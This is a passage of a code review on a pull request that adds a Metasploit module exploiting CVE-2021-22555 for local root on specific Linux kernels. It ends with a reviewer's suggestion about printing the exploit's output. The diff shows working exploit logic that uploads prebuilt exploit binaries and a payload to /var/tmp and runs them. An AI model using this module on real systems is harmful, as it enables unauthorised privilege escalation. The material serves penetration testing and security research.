modules/exploits/linux/local/netfilter_priv_esc.rb

```diff
@@ -0,0 +1,138 @@
+            'Szymon Janusz' # The author of this module
+          ],
+        'DisclosureDate' => '2021-07-07', # YYYY-DD-MM. Public disclosure date
+        'Platform'       => 'linux',
+        'Arch'           => [ARCH_X64, ARCH_X86],
+        'SessionTypes'   => ['meterpreter', 'shell', 'shell linux'],
+        'Targets'        =>
+          [
+            ['Automatic', {}]
+          ],
+        'DefaultTarget'  => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ], # The module could fail to get root sometimes.
+          'Stability' => [ OS_RESOURCE_LOSS ], # After too many failed attempts, the system needs to be restarted.
+          'SideEffects' => [ ]
+        },
+        'References' =>
+          [
+            ['CVE', '2021-22555'],
+            ['URL', 'https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html'],
+            ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+            ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+          ]
+      ))
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp'])
+      ]
+    )
+
+    deregister_options('ContextInformationFile', 'WfsDelay')
+  end
+
+  def base_dir
+    datastore['PAYLOAD_DIR'].to_s
+  end
+
+  def supported_kernels
+    ['5.8.0-48-generic', '5.4.89']
+  end
+
+  def kernel_supported?(kernel)
+    supported_kernels.include? kernel
+  end
+
+  def check
+    release = kernel_release
+    if kernel_supported? release
+      CheckCode::Vulnerable("Running against a system with kernel release #{release} that is vulnerable.")
+    else
+      CheckCode::Safe("The kernel release #{release} is not currently supported.")
+    end
+  end
+
+  def upload_exploit_binary
+    release = kernel_release
+    @executable_name = rand_text_alphanumeric(5..10)
+    @executable_path = "#{base_dir}/#{@executable_name}"
+
+    # Ubuntu 5.8.0-48-generic
+    if (release.include? '5.8.0-48-generic')
+      upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'ubuntu_5_8_0_48_generic.elf'))
+    elsif (release.include? '5.4.89')
+      upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'centos_5_4_89.elf'))
+    else
+      fail_with(Failure::NoTarget, 'The target OS cannot be targeted by this exploit. Considering submitting a PR to add support for this target!')
+    end
+    register_file_for_cleanup(@executable_path)
+  end
+
+  def upload_payload_binary
+    @payload_name = rand_text_alphanumeric(5..10)
+    @payload_path = "#{base_dir}/#{@payload_name}"
+    upload_and_chmodx(@payload_path, generate_payload_exe)
+    register_file_for_cleanup(@payload_path)
+  end
+
+  def run_payload
+    response = cmd_exec(@executable_path, @payload_path, datastore['CmdTimeout'])
```

Comment:
Recently I found it useful to `vprint_status(response)` so the user can see what's gone wrong themselves

https://github.com/rapid7/metasploit-framework/pull/15695/files#diff-f02f56d525ee27f2646fa187e83749c44581f28b54ba6ef1a25c291c5ab36bddR100